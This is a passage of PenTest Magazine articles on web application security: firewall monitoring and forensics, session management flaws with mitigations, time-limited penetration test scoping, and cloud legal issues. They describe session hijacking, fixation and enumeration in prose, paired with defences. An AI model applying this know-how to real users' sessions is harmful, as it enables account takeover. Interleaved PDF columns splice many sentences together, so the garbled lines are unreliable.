Each zone containing web applications has to be Authentication, Authorization
filtered on incoming and outgoing content and on the Applications use identities to control access to various
use of the protocol itself. resources and functions.
This type of deployment is often called deep defense The association of the identity context and security
and has the ability to monitor the various attacks at both increases efficiency in the detection of anomalies. For
the application and network levels. example, a whitelist adapted according to the type of
Last but not least, the association of the identity user can verify access to information based on user
context with security policy allows better detection of role.
anomalies.
Ensuring Continuity of Service
Traffic Filtering: Application security is primarily related to the
The WAF (Web Application Firewall) exploitation of vulnerabilities in order to divert normal
Web application firewalls can be considered as an use for malicious purposes.
extension of application network firewalls. They are However, some attacks based on weaknesses can
able to analyze HTTP and the content it conveys. The be devastating in effect, perpetrated to make the
device is strongly recommended by section 6.6 of PCI- application unavailable, and thereby provoke losses
DSS. due to activity downtime.
Often used in reverse proxy mode, it allows for a To retaliate, it is necessary to establish protective
break in protocol and facilitates the restructuring of measures that block denial of service and automated
areas between applications. processes, and to ensure load balancing and SSL
The WAFEC document (Web Application Firewall acceleration.
Evaluation Criteria) published by WASC is a useful
guideline that helps to understand and evaluate different Operation
vendors as needed. Monitoring
The WAF also helps to monitor and alert in case of It is important to understand the use of the application
threat in order to trigger a rapid response (eg blocking during production, to monitor and detect abnormal
the IP of the attacker via a dialogue protocol with behavior, and make decisions accordingly:
network firewalls).
• Blacklist
Traffic Filtering: • Legal Action
The WSF (Web Services Firewall) • Redirection to a honeypot
It represents an extension of the WAF on the protocols
carrying XML traffic over HTTP, such as SOAP or Log Correlation
REST. Understanding abnormal behavior in an application
XML and its standards make security management helps in locating an attack.
easier in the sense that the operation of the service An application infrastructure can comprise hundreds
is described by documents generated directly by the of applications.
development framework (eg WSDL, Schemas). To understand the attack as a whole and monitor
Web services are vulnerable to the same attacks as changes (discovery, aggression, compromise), it is
web applications; they consequently need the same necessary to have holistic view.

THE BEST OF 01/2012 Page 157 http://pentestmag.com


WEB APP PENTESTING
To do this, it is imperative to confront and correlate • Unknown daemons or unusual groups and users
logs correlation to obtain real-time overall analysis and • Etc.
understand the threat mechanics.
Analysis of network equipment
• Mass Attack on a type of application During the various bounces within the application
• Attack targeting a specific application infrastructure, the discovery and exploration of new
• Attacks focused on a type of data possibilities leaves fingerprints. Network firewalls keep
precious logs with traces of these attempts. In addition,
Reporting and Alerting if access is logged, it is important to check if there are
The dialogue between application, network and security connections to web applications at unusual times.
teams is often complex within an organization. Formalized
reports on attacks and the use of the application provide The End justifies the Means
a basis for work and an understanding of application In conclusion we can see that the means used to
threats for these teams. achieve an APT are often substantial and proportional
Alerts will enable them to react and trigger procedures, to the criticality of targeted data. APT are not just
either at the network level by blocking the IP of the temporary attacks, but real and constant threats with
attacker, or at the application level by forbidding access latent effect that need to fought in the long run.
to resources / areas, or more directly by referral to The security of an application infrastructure begins
a honeypot in view of analyzing the behavior of the with the conception process and requires basic rules to
attacker. be respected to simply security operations.
Real-life experience of application management
Forensics highlights difficulties in implementing all the good
Understanding the scope of an attack practices.
For each area compromised, it is important to A comprehensive study of threats, appropriate
understand what elements have been impacted, and response and anticipation of possible incidents are now
to trace the attack to the roots of the intrusion and the recommended procedure in dealing with application
compromise by the installation of a backdoor, bounce attacks.
mechanisms to other areas and / or extraction of data.

Analysis of application components


To understand how the intrusion occurred, it is
important to look for abnormal uses. One example could
be the presence of anomalous data in a variable, a
cookie. To drill down to this level, the logs of the various
application components turn out to be very useful:

• Web server or application


• Database
• Directory
• Etc.

Systems Analysis
To understand how the attacker remained in the area, it MATTHIEU ESTRADE
is important to identify the type of backdoor used. From Matthieu Estrade has 14 years experience in internet security.
the simplest act such as the placing an executable file In 2001 Matthieu designed a pioneering application �rewall
in the application itself, to the injection of code into a based on Web Reverse Proxy Technology for the company
process (eg hook network functions), it is necessary to Axiliance. As a well known specialist in his �eld he soon
analyze the system hosting the application. became a member of the Open Source Apache HTTP server
development team. His security expertise has been put to
• Changed configuration files contribution in WASC (Web Application Security Consortium)
• Users added projects like WAFEC and WASSEC. Matthieu is also a member
• Security rules changed of the French OWASP chapter. Matthieu is currently CTO at
• Errors of execution or increase in privileges BeeWare.

THE BEST OF 01/2012 Page 158 http://pentestmag.com


WEB APP PENTESTING

Web Session
Management
– Reality is a nightmare!

Session Management is fundamentally a process of keeping track


of a user’s activity across multiple connections or interactions with
the machine.

I
n web based applications, the primary protocol is • Cookie transfers and information disclosure
HTTP which we all know is a stateless protocol. • Session Expiration timelines
It means instead of relying on the established • Session handling when a user logs out
TCP connections for anything more than
GET/POST request, we need a session
management to make this stateless
protocol support session states.
On a broad spectrum following are the
primary identifiers that support and/or
manage the established session between
the server and the client,

• Session ID
• Cookie Values/Parameters

A browser can maintain the state


information in an HTTP session
with Cookies, URL rewriting, Codes
(Challenge/Response), Hidden form
fields (SessionID) etc. (Figure 1).
In scope of this article, and real world
scenarios, I will target the SessionID
and Cookie parameters of different
requests. Here are some ideal conditions
and requirements for the web session
management, and should always be
thought upon before deploying a web
application on the production servers, Figure 1. HTTP Sesion

THE BEST OF 01/2012 Page 160 http://pentestmag.com


Case Study – Social Networking Portals
Here are some real world scenarios for social
networking portals which are a nightmare to web based
session management.

Cookie Transfer Channel


We all are very well aware of the HTTPS channel which
is being deployed for password and authentication
measures. Whenever we authenticate, the password
and the required credentials pass on the secure (SSL/
TLS) channels. But, after the authentication, the equally
important cookies (session authentication validation)
traverse on an unencrypted channel (Figure 2). It
means, sniff the cookies and you have the session if it
is not mapped to IP address, browser or any client side
directives.
In ideal conditions, the authentication cookie should
always be sent on the encrypted channel (Figure 3).
But, most of the social networking portals and even
Figure 2. Traverse on an unencrypted channel other web sites deliver the cookies on HTTP during
some data exchange on the channel (Figure 2 and
A pentester can look for these flaws and vulnerabilities Figure 4).
while accessing such web application. It is very
important to validate the session management in Session Expiration Timelines
a critical application, as it can lead an attacker to Session expiration is an important factor when it comes
gain control of a session even without having any to session hijacking. Even though it also requires
information of the credentials. Once the basics of intermediate effort of sniffing the session cookies, but
session management have been explained with real a brief search of cookies on any search engine, may
world examples, the article will also document the sometimes direct you to the pages where the naive
protection measures (or workarounds) to fix such kind users have pasted their cookies to sort some technical
of vulnerabilities. issues in authentication. If the expiration is not on time,
an attacker can get your session by importing such
Disclaimer cookies. (Figure 4 and Figure 5)
This article may reflect certain flaws in some real As we can see that in these popular social networking
world applications, but should not be considered as a & dining websites, the cookies are not handled securely.
vulnerability disclosure for the respective vendors. To There are expiration issues, transfer issues, and even
protect the identity, I will mask the domains wherever cookie randomness issue (Figure 4). As shown in Figure
necessary. 4, the cookie value is constant and this is a serious

Figure 3. Authentication cookie sent to encrypted channel

THE BEST OF 01/2012 Page 161 http://pentestmag.com


WEB APP PENTESTING
issue. Every time the user logs in, the web application Session Enumeration
allots the same cookie value to the browser session. Session Enumeration is possible when it is fairly easy
to guess the session ids and it can be due to their
Session Log Out sequential nature, or easy encryption policies. If an
What happens when a user logs out? Ideally the cookie attacker can derive a session ID, he can impersonate
should also expire with session log out. But, it is evident as other users via valid sessions.
that cookie still persists and is valid. On successive
login, the web application allots a new cookie, but the Workaround
old cookie is still valid till the date of its expiry. This is a It can be fixed by deploying powerful encryption
serious security configuration issue. algorithms, and randomness involved in session
Any attacker if successfully manages to sniff the tokens.
cookies, can hijack the session even if the user has
logged out of his/her session. Session Fixation
Session fixation is more of a social engineering
Common Vulnerabilities attack where an attacker sends a URL with the
What if there are flaws in session management? What target site and once they login, an attacker will get to
are the common vulnerabilities or a administrator’s know the Session ID they are using. This is possible
nightmare? when a session ID is imported via requests in URL
parameters. So, a forged URL to the target website
a) Failure to protect the session data will allow the victim to set a session ID of attacker’s
choice.
Session Manipulation
Session Manipulation is a very simple kind of attack Workaround
in which an attacker can modify the parameters of the It can be protected by issuing a new session ID when
session via the cookies, and can send it back to the the user changes the authentication state, and by being
server. more aware of not accepting any session ID that is not
created by your application.
Workaround
It can be protected by using encryption, and by limiting b) Failure to clean up when the user logs out of the
the amount of data sent to the client. session:

Figure 4. Cookie import

Figure 5. Cookie import

THE BEST OF 01/2012 Page 162 http://pentestmag.com


Session Expiration or 2-factor authentication. But if 2-factor is too much
Session lifetime is very important and if not properly overhead for social networking or non ecommerce
configured, it can lead an attacker to have a larger websites, re-auth can still be taken into account.
attack window to try different session based attacks. This is effective in that it completely protects the
operation against an attacker who has compromised
Workaround the session management system, but does not know
To protect this kind of vulnerability, de-authenticate the password. However, this protection must be
sessions after a certain period of inactivity. Even a well used judiciously, as every password entry provides
configured application can force re-authentication, or an opportunity for the password to be captured if
re-issue of cookies on session time-outs. transferred on an unsecured HTTP channel or open un-
trusted public networks.
Broken Logout One operation that must be protected in this way is the
As evident from the examples above, it is very change password function. Without this protection, an
necessary for a session to close when a user logs out attacker who has compromised session management
of the session. It is scary over public networks, or cyber can easily escalate this to knowing the password, i.e.
café! The regular steps of deleting the session cookie is full access.
not sufficient and nor closing the browser window.
Timeout and Logout
Workaround An important feature to provide is a reliable logout
The basic protection against such vulnerabilities function. When the user selects this, they know that
involves the invalidating the cookies, and session on as long as their password was not captured, no further
logout so as any attacker importing the same cookies access will be allowed to their account. As previously
should not validate the session. discussed, a major motivation for using a session ID is so
this can be invalidated at the server, rather than relying
Generic Mitigations on the browser to remove the password from memory.
Here are some generic mitigation checks that are Another common mitigation is to place a time
independent of the application type, code and design: limit on a session ID. Most bank websites have an
inactivity timeout that invalidates a session ID after,
Compartmentalization say, 5 minutes of inactivity. This is a good idea, but I
Breaking the website down into separate compartments believe it is also important to have an absolute timeout,
is a wise precaution. If done correctly, this means that perhaps forcing re-authentication every four hours. If
flaws discovered in one compartment will not affect there is only an inactivity timeout, then an attacker who
the security of any other. For example, a website may has stolen the session ID can keep it valid by making
have a secure area for account administration and periodic requests.
another logged in area which is a discussion forum. If
a flaw were discovered in the forum software, the aim IP Address Restrictions
would be for this not to affect the security of account An interesting way to defend session IDs is to restrict
administration. the session to an IP address. While IP address spoofing
Compartmentalization in this manner protects against is possible, in practice it is very difficult to spoof a TCP
web attacks like XSS. However, if the two compartments connection from an arbitrary IP address. All the packets
are running on the same server then it does not protect returned from the server will go to the proper IP address.
against back-end attacks, such as SQL injection or buffer Unless the attacker controls a network en-route, they
overruns. Depending on the perceived threats it may be will not be able to read these packets. To establish a
desirable to enforce further compartmentalization, e.g. TCP connection, the client must echo a 32-bit random
separate physical hardware. number correctly to prove they are not spoofing. This
raises the bar considerably for an attacker who has
Extra Authentication (Sensitive Operations) stolen a session ID.
In many applications some operations are particularly Unfortunately, there are legitimate reasons a user
sensitive. For example, in a banking application may change IP address during a session. It has long
the send money operation needs to be protecting been accepted wisdom that although IP address
most of all. One option to achieve this is to require restrictions are desirable for security, they cause too
extra authentication for the sensitive operation. The many problems for legitimate users to be used on
authentication could take any form – re-authentication production websites.

THE BEST OF 01/2012 Page 163 http://pentestmag.com


WEB APP PENTESTING
References
• http://www.westpoint.ltd.uk/advisories/Paul_Johnston_GSEC.pdf
• http://www.leviathansecurity.com/pdf/Web%20Session%20Management.pdf

Two main reasons for being a skeptic against IP • To prevent brute force password guessing, enforce
restrictions, a strong password policy, do not leak the existence
of user names and implement some failed login
• Some clients make several requests from one IP limits.
address, and then make several requests from
a second, sometimes with a gap between the A pentester can keep such a checklist as a benchmark
blocks of request. This suggests the end user is option for web applications, but remember: the
changing IP address, perhaps reconnecting their checklist alone is not enough. It is always necessary
modem. and expected from a pentester to be effective in
• Some clients make requests from multiple IP impromptu situations and bring something out of the
addresses in a small range, seemingly at random. box.
This suggests that the ISP is using multiple, load-
balanced web proxies. When a user makes a web
request, it may be routed through any one of these
proxies, usually at random.

Conclusion
Having looked at various vulnerabilities and mitigating
steps, here is a conclusive summary of the possible
workarounds.

Summary of Mitigations
We have now looked at all the major attacks against a
session ID cookie login system. Various mitigations are RISHI NARANG
available, some of which are appropriate for a moderate Rishi Narang is currently working as
security site. Here is a checklist of precautions for Lead Vulnerability Research Engineer
developers to follow: for Qualys Inc. He has about 7 years
of experience which includes research
• Make the session ID a 128-bit cryptographically on vulnerabilities, malware, protocol
secure random number. This prevents anyone analysis, evolving attack vectors and
predicting or brute forcing the ID. signature development for network &
• Use the secure and HTTPOnly cookie options, to host based IDS/IPS products.
prevent theft through XSS and information leakage In the past, he has served as Senior
over non-SSL requests. Consultant at Deloitte & Touché and Security Researcher
• Disable the TRACE/TRACK HTTP methods, to with Trend Micro. He holds a B.Tech degree in Information
prevent HttpOnly being circumvented. Technology, CEH and CCNA certi�cations and has been a part
• Change session IDs at login time, or alternatively of SuSE, Red Hat & Ethical Hacking trainings in different parts
only issue them at that point. This prevents session of the country.
fixation attacks. Among his key public disclosures, he has been responsible
• Ensure all requests that cause a data change on for LinkedIn vulnerability and �rst Google Chrome exploit.
the server use a random authorization token, to He has been quoted by Reuters, Forbes, eWeek, CNET,
prevent CSRF attacks. InformationWeek, The Register and many other main stream
• Provide a logout function that invalidates the media. He has been an author and advisor for Hakin9
session ID on the server. and PenTest magazines. He has been a speaker at OWASP
• Put time limits on session IDs to reduce impact of (Mumbai Chapter, India), Bangalore Cyber Security Summit
theft – both inactivity and absolute timeouts. and eSurakshit conference in India.
• Separate large sites into compartments, which use He can be reached via Twitter (@rnarang) or
different domain names. rishi@wtfuzz.com.

THE BEST OF 01/2012 Page 164 http://pentestmag.com


WEB APP PENTESTING

Modeling Security
Penetration Tests with Stringent Time Constraints

At XBOSoft, it often happens that our clients decide to do security


testing late in their test cycle, after we have finished the regular
functionality or performance tests. With time often the most
important constraint, how to best execute these security tests
depends on many factors.

I
n order to create a test strategy that allows us to Determining Project Objectives
execute security tests with enough coverage in We usually see two types of stakeholders: managers
the given time frame we created the Modeling, and developers, both expecting something different.
Planning, Execution, and Analysis (MPEA) approach. Managers want to know whether the product is secure
MPEA divides the penetration testing into four phases, or how secure it is, whereas developers want to know
allowing us to implement the tests more effectively and exactly where the flaws are located in the system. To
efficiently: satisfy both, our test objectives should include:

• Modeling phase: Deliver a risk profile that can be • A high level summary that explains the general
used as input for the activities of the remainder of state of the security of the system. Managers
the project. The profile contains the scope of the need this to answer the question: Am I looking at
tests and the stop criteria a fundamental flaw that stops going live or do we
• Planning: Deliver the test strategy and the test plan have a generally faulty build process that needs
• Execution: Execute the penetration and deliver the tidying up? Satisfying management’s objectives
tests results according to the test plan should be done through easy to read and
• Analysis: Analyze the test results and deliver a understand graphs and charts.
report • For developers we recommend a tabular list of
issues including a title, a description, a list of hosts
This article discusses the modeling aspect of our affected, an estimation of severity and a suggested
approach and will explain how to best model security fix or workaround.
projects with little time, including:
The estimation of severity could be as simple as high/
• Determining Project Objectives medium/low, or include more detail such as: ease of
• Modeling goal exploit, complexity to fix and the extent of resulting
• Gathering System Information compromise. Ease of exploit plays back into the model
• Developing a Risk Profile so that developers can see if they need to worry
• Testing tools or manual testing about the issue, complexity to fix plays into the risk
• Vulnerability Investigation-Stop Criteria management decision on going live and the extent of

THE BEST OF 01/2012 Page 166 http://pentestmag.com


resulting compromise is used to drive behaviors from • Internal malicious users, who can attack the system
non-security team members who may not understand from inside the intranet, often as employees and
the problem’s severity. administrators of the system

Modeling goal The output for this phase should include:


The goal of the modeling phase is to develop a risk profile
as described below which can be used to evaluate the • Network Map
system’s security. The profile should include: • Operation system information
• Services Provided
• System Information, a description of the system, listing • Intermediary Devices
all the services and applications the system uses • 3rd party Applications
• Potential vulnerability types the system may • Features of systems
encounter, prioritized by the impacts it may cause.
• Stop criteria, describe the criteria of terminating the The first four items are often mentioned as common
task ways for external anonymous hackers to break into a
• Tools list, for both gathering information and system. And information of the last two items should
exploiting each type of vulnerability be collected also, for they are quite easy to exploit and
• Other QA tools or supporting tools, such as tools to more and more hackers are knowledgeable of using
record the desktop or tools to record the operations these resources.
the testers execute The 3rd party applications that we should be aware of
are documentation applications and plug-in applications,
With time constraints, the output of the modeling phase some of which are not well tested for security. But even
significantly impacts the remainder of the project. A for well tested applications, new security flaws are
complete and good modeling profile will save time for continuously reported by researchers, such as MS
critical exploits, as it clearly identifies the test scope Office remote execution flaws. In one month, over 30
and prioritizes the test activities so that testers will not security flaws reports regarding well-known applications
waste time on unnecessary tests. Hence, modeling including Adobe applications, .Net Framework, Office
precedes planning. applications, and Mozilla applications can be found
on the security bulletin pages of their official web sites.
Gathering System Information And per statistics by Kaspersky in 20101, top 20 found
Security vulnerabilities are usually related to technique vulnerabilities, 89.6% of overall vulnerabilities, were
and logic. To develop a complete model, some additional contributed by Microsoft Office and XML Core Services,
information should be considered as compared to Sun Java JDK/JRE, Adobe Flash Player, Acrobat/
traditional penetration tests. It is worth spending more Reader and ACDSee.
time on gathering information even in a situation where Poorly designed or developed features may also cause
you have limited time because it will save you a lot of security risks. Through these types of vulnerabilities, a
time later when planning and executing tests. Make sure malicious user can obtain sensitive information and
you complete a thorough information gathering phase harm or even break into the system. Most frequently
delineating as many risk sources as possible, thereby encountered problems in our work include:
enabling you to prioritize your efforts later in the process
Some security testing proponents start gathering • Information leakage from features
information with a scan tool to get the server information, • Feature abuse
services running on the server and finally get the whole
map of the system. But that is not enough for simulating A functionality expert of the software under test should
malicious attacks, especially those from the system’s check whether all functionality has been considered by
end users. Sources of attacks are from three different the model. For example, if mail functionality has been
roles of the system. overlooked in listing out all functions, it could overlook
possible attacks like SMTP injections. Another
• External anonymous hackers, who intend to break example could be directory access functions which
in the system could lead to LDAP injections in special fields not
• External malicious system users, who use the modeled in your profile because services scanning on
features of the system to do harm to the system, or a local server could not find those when using remote
exploit the system for their benefit in some way services.

THE BEST OF 01/2012 Page 167 http://pentestmag.com


WEB APP PENTESTING
Developing a Risk Profile We should also include less common, but still very
Section I Listing Risks-Vulnerabilities critical risks. These risks are difficult to assess
The vulnerabilities list should include those related to because they are related to the actual deployment
the application and the environment. The vulnerabilities environment and the users’ habits. These may include:
are divided to followings parts:
Unverified terminals
• Common vulnerabilities: This phenomenon occurs when someone takes his own
• Authentication Problems computer into the office. With this computer, users can
• Authorization Problems penetrate the system if the MAC or IP address is not
• Cookie Problems well filtered.
• SQL Injections
• XSS Attacks Old servers
• Denial of Services A server that is not often used but may be running
• Incorrect share and file permissions some programs without any vendor security patches,
• 3rd party application security flaws. or IT administrators simply forget about them and
• On the official web site of a 3rd party application, do not add the patch onto the servers. In addition,
the security flaws are usually published older operating systems will contain many security
• On websites dedicated to security , the security vulnerabilities.
flaws of some 3rd party applications are
published Legacy Programs
• Vulnerabilities related to special features Security vulnerabilities exist in all types of software. In
Besides the most often occurring vulnerabilities, our daily use of any older versions of office software,
vulnerabilities that are related to certain features they may not contain needed security patches and
should also be listed. Figure 1 is an example of important security upgrades.
specific features and potential risks associated with
them. Corporate Employees and the local administrator
• Vulnerabilities related to logic defects These internal risks are very critical because they
know the system and often understand both security
holes and the events that may open up these
vulnerabilities.

Administrator Authorization
Most administrators are accustomed to use super
administrator to login into the system. This practice is
dangerous as mis-distributing the authority of the super
administrator can lead to many problems.

Figure 1. Mapping risks to features Figure 2. Vulnerability frequency assessment

THE BEST OF 01/2012 Page 168 http://pentestmag.com


VPN Client • Phase 3 should used to exploit medium priority
Many employees use their home computer or laptop risks while phase 4 for low priority ones.
on the road to access the company’s VPN. Once these
computers access the company’s VPN, the security Testing tools or manual testing
vulnerabilities that exist in their personal access will Choosing tools can also be a challenge. We should
spread through the VPN. use tools as much as possible to save time. On the
other hand we cannot completely trust the tools as they
Section II. Prioritizing Risks sometimes can be unreliable. According to different
With time constraints, we need to prioritize as we types of vulnerabilities, the tools should be applied
cannot execute all penetration. Prioritizing risks can separately:
be done using different weighting models according
to preference. At XBOSoft we do this by assessing the • For logic-related defects, manual penetration is
likelihood of potential exploits and the impact of these necessary. Many tools will support the investigation
exploits if they should occur. to get/post http messages.
To determine the possibility, we maintain a matrix that • Popular security vulnerabilities are covered by
the states the frequency of different vulnerabilities in commercial scanning tools, like AppScan and
different types of products. Following figure shows the WebInspect. These commercial tools can scan
top eight in our matrix. for common vulnerabilities while specific tools
Prioritizing vulnerabilities (and the effort that should can be used for more definitive for well-known
be spent to eliminate them) should be done according vulnerabilities. Use tools to exploit these kinds of
to: common vulnerabilities.
• Special vulnerabilities of 3rd party applications are
• The type of application and its usage, as well as covered by some software developed by security
the vulnerability’s reputation. For example, the software companies like MS05-051 Scan from
well-known XSS vulnerability is not so critical to McAfee for Vulnerabilities in MSDTC and COM+.
a news web site, but compared to a healthcare Specific tools are also could be found on official
application, where patient data needs to be kept web sites of 3rd party applications or security
secure, information leakage and its priority will be communities.
different.
• The potential impact. The potential impact is used In addition, tools can be divided into two categories:
to describe the severity of the vulnerability and its specific use for one type of vulnerability and multi-use
relativity. Relative severity definitions can be found for several security vulnerabilities. Here is a strategy to
at, for example, PCI DSS2. save time and money in allocating time and resources
for using these tools:
Section III Test Scope Strategy
The test scope should be drafted into different phases • At least one multi-vulnerability scanning tool should
as depicted in Figure 3. be used if you have budget to get one as they
can be quite expensive. Run the tool to scan the
• Phase 1 includes those that can be completed application once or twice to get a whole picture. Do
easily without deep penetration testing.
• Put the easy-to-find vulnerabilities into phase 1
no matter the priority as these will not take a lot of
time
• High priority vulnerabilities should be finished in
phase 1 and phase 2.
• The first two phases contain the majority of the
penetration tests and should always be executed.
• Ad-hoc testing is carried out to avoid leakage
and should be executed in phase 2 and 3 by
experienced team members simulating end users.
High priority vulnerabilities should be executed in
phase 2 including tool supported tests and manual
exploits. Figure 3. Test scope phased strategy

THE BEST OF 01/2012 Page 169 http://pentestmag.com


WEB APP PENTESTING
References
• Kaspersky Security Bulletins 2010, Statistics, 2010, http://www.securelist.com/en/analysis/204792162/Kaspersky_Security_Bulle-
tin_2010_Statistics_2010
• PCI DSS, https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml

not spend too much time on analyzing the reports, exists, then there is no need for more investigation. For
since often you may find the reports from different example, I will not try to break a Windows system when
test executions may be different. The differences I get a SQL server account on that server because I
may be caused by server status, user status, tool’s know I am able to. Or, if I find an XSS vulnerability,
bugs, making investigating them quite complicated. I will not try to implement an actual attack because
For minor problems raised by this kind of tools, although I may fail, I know another more senior hacker
such as sensitive information leakage risks, go can. The most important aspect of investigating
through them quickly. For the critical/medium vulnerabilities and their level of importance is to record
problems, leave them to specific tools or manual how to reproduce the flaw and assess it by listing the
penetration tests. potential risks.
• For each of the common vulnerabilities, a specific
tool should be prepared to complement the Conclusion
commercial multi-vulnerability scanners mentioned Our overall goal of penetration testing is to reduce
above as they sometimes cannot cover every vulnerability-associated risks in a limited time. Just like
corner of the application. We once manually in black-box functional testing, we need to find the most
discovered an SQL injection flaw which located in important defects as soon as possible. Only security
a textbox that was not found by multi-vulnerability defects have different characteristics and therefore,
scanners. So specific tools, even manual tests, require a different approach. Similar to black-box testing
should be applied for specific vulnerability types. where models are useful for test case design to optimize
• For uncommon vulnerabilities, many organizations the testing process, security penetration testing requires
provide specific tools. For instance, SSL testing a similar modeling approach. The objective of this
via McAfee and AJAX from OWASP. If a well article is to present a modeling framework for executing
developed tool cannot be found, don’t try to a security penetration testing project with stringent time
develop one because this will usually take a lot of constraints. With this model, it is possible to achieve the
time. The best choice is to manually investigate the most ‘bang for the buck’ in phases 1 and 2 and still, at
vulnerability. any moment during the test execution, you can stop and
say, we have done our best at this point in time.
As a tip, after discovering a critical vulnerability,
manually reproducing them is necessary in order to
completely understand the flaw and the severity in
a real situation. We once over-assessed a flaw as
critical, but actually it should have been characterized
as low priority because the flaw was blocked in a real
usage situation and not critical.

Vulnerability Investigation-Stop Criteria


When you are sure you or someone could break the
system and have ascertained that the vulnerability

About XBOSoft
XBOSoft is an international �rm specializing in software
quality assurance with branch offices in the USA, Europe and
China. With a proven record of success working for Fortune
500 companies and specialized ISVs, XBOSoft has gained
broad domain expertise with extended experience in �nance ALAN CAO
and healthcare. Alan Cao is a Project Manager at XBOSoft, where he works
Our commitment to software quality improvement is on software security assurance and testing projects. Alan
implemented through practical quality assurance processes holds a master’s degree in Software Engineering from Peking
combined with deep technical expertise.
University and is also a MCITP and ITIL Certi�cated.

THE BEST OF 01/2012 Page 170 http://pentestmag.com


WEB APP PENTESTING

Cloud Computing
– Legal Issues
Cloud computing involves the sharing or storage by users of their
own information on remote servers owned or operated by others and
accessed through the Internet or other connections. Cloud computing
services exist in many variations, including data storage sites,
video sites, tax preparation sites, personal health record websites,
photography websites, social networking sites, and many more.

C
loud computing has significant implications for in the cloud as secure as data protected in user-
the privacy of personal information as well as for controlled computers and networks? Privacy and
the confidentiality of business and governmental security can only be as good as its weakest link. Cloud
information. While the storage of user data on remote computing increases the risk that a security breach may
servers is not new, current emphasis on and expansion of occur.
cloud computing warrants a more careful look at its actual One of the problems with cloud computing is that
and potential privacy and confidentiality consequences. technology is frequently light years ahead of the law.
For some information and for some business users, There are many questions that need to be answered.
sharing may be illegal, may be limited in some ways, Does the user or the hosting company own the data?
or may affect the status or protections of the information Can the host deny a user access to their own data? If
shared. Even when no laws or obligations block the ability the host company goes out of business, what happens
of a user to disclose information to a cloud provider, to the users’ data it holds? And, most importantly from a
disclosure may still not be free of consequences. privacy standpoint, how does the host protect the user’s
When users store their data with programs hosted on data? So we carefully analyze the various laws and
someone else’s hardware, they lose a degree of control policies that the host has to abide by and also carefully
over their sensitive information. The responsibility for look to analyze certain aspects of the license and end
protecting that information from hackers and internal user agreements that help share liability and empower
data breaches then falls into the hands of the hosting government agencies to still access certain kind of
company rather than the individual user. Government information without breaking the privacy laws.
investigators trying to subpoena information could
approach that company without informing the data’s Introduction
owners. Some companies could even willingly share Cloud computing can be called as a natural evolution
sensitive data with marketing firms. So there is a of the widespread adoption of virtualization, service-
privacy risk in putting your data in someone else’s oriented architecture, autonomic and utility computing.
hands. Obviously, the safest approach is to maintain Details are abstracted from end-users, who no
your data under your own control. longer have need for expertise in, or control over, the
The concept of handing sensitive data to another technology infrastructure in the cloud that supports
company worries many people. Is data held somewhere them [Wikipedia].

THE BEST OF 01/2012 Page 172 http://pentestmag.com


Cloud computing is a term describing both application network features like firewalls but not the general
and platform. A cloud computing platform dynamically cloud infrastructure.
provisions, configures, reconfigures, and deprovisions For example, a clothing store needs additional
servers as needed. Servers in the cloud can be physical computing power for its website during the holiday
machines or virtual machines [IBM Cloud Computing]. Advanced shopping season.
cloud systems usually include storage area networks
(SANs), network equipment, firewall and other security Security Issues
devices. The tremendous amount of data available in the cloud
Cloud computing also describes applications that are makes them a target for hackers and cyber criminals
extended to be accessible through the Internet. These as well as of various government agencies for national
cloud applications use large data centers and powerful security or law enforcement purposes. Though Clouds
servers that host Web applications and Web services. share some of the security risks with other distributed
Anyone with a suitable Internet connection and a and networked systems, the sheer size of the clouds
standard browser can access a cloud application. greatly magnifies the risk these problems pose. Some
of them are as follows:
Definition
The U.S. National Institute of Standards and • Potential Personnel Vulnerabilities
Technology (NIST) has developed a widely accepted • Data Loss
definition: Cloud computing is a model for enabling • Third Party Programming
ubiquitous, convenient, on-demand network access • Difficulty of Determining Responsibility for Security
to a shared pool of configurable computing resources Breaches
(e.g., networks, servers, storage, applications, and
services) that can be rapidly provisioned and released Other more common security issues that customers
with minimal management effort or service provider should raise with vendors before selecting a cloud
interaction. This cloud model is composed of five vendor are: – (the following passage has been taken
essential characteristics, three service models, and four from the Gartner Security Report)
deployment models.
• Privileged user access
Essential Characteristics • Regulatory compliance
• Data location
• On-demand self-service • Data segregation
• Broad network access (mobile, laptop, PDA) • Recovery
• Resource pooling • Investigative support
• Rapid elasticity • Long-term viability
• Measured service (metering / pay as you go)
Legal Issues
Clouds can deliver services via three models Transborder Data Flow and Legal Obligations in
Multiple Jurisdictions
• Software as a Service: The consumer runs a The sharing of data within the cloud and the inability to
specific computer application, but does not control specifically identify and trace the exact location of the
the infrastructure that runs the application. data can cause jurisdictional, policy and legal issues. For
A popular example is Google Docs, to create and example under the EU Data Protection Directive, unless
store remotely documents using Google’s software. certain steps are taken, organizations are prohibited
• Platform as a Service: The consumer creates and from transferring personally identifiable information to
delivers new electronic applications but does not countries that do not provide the same level of protection.
control the cloud’s infrastructure. Hence an organization may have to specifically request
One prominent example is Microsoft Azure, a cloud provider to limit its data storage to certain areas.
allowing users to construct, distribute and modify (E.g. Amazon CS2 asks the user if they want to be part of
applications. the European cloud or both or the one in USA.
• Infrastructure as a Service: The consumer uses
provides services as could be accomplished by Reasonable Security Under the Law
buying new hardware. The consumer controls Reasonable Security in the cloud computing, and
applications, operating systems, storage and some potential liability arising out of security breaches in

THE BEST OF 01/2012 Page 173 http://pentestmag.com


WEB APP PENTESTING
the cloud create legal issues which are very difficult to the service providers to ensure that the legal &
handle. Generally speaking if a company outsources the regulatory requirements are met.
handling of personal information to another company
they may have some responsibility to make sure the Implications
outsourcer has some level of reasonable security to Not meeting the legal & regulatory requirements
protect personal and confidential information. But could lead to legal actions causing loss of business,
Service providers using the cloud platform essentially public trust, financial penalties and imprisonment as
rely on the security of each of the cloud participants applicable.
receiving personal information. The legal question is
what liability does a company face when there has been Acquisition of Digital evidence/e-discovery
a security breach in the cloud that has resulted in the Utilizing the cloud can be problematic in the litigation
theft or harm of valuable or protected data? context. Litigation ensues and a litigation hold is initiated,
We are so much surrounded by legal & regulatory the organization will have to deal with a third party cloud
requirements like SOX, SAS 70, HIPAA, PCI DSS, provider in order to get case relevant information. In
ISO 27001, Reasonable Security Practices U/IT certain cases the investigation takes place months after
Act, 2000 (India) etc. Depending upon the nature of the crime has been committed, in that case it may not
business and kind of data being handled, different be easy for that provider to actually preserve the data
legal & regulatory compliance requirements are that is needed for several reasons.
applicable. In Cloud Computing scenario it becomes
imperative that the service provider should meet Interception/Encryption
the legal & regulatory requirement on behalf of Most of the countries have laws relating to interception of
the customers. So if a Cloud Computing service data. Government can, in the interest of the sovereignty
provider is a servicing a client in Health Care sector or integrity of the country, for defense purposes, to
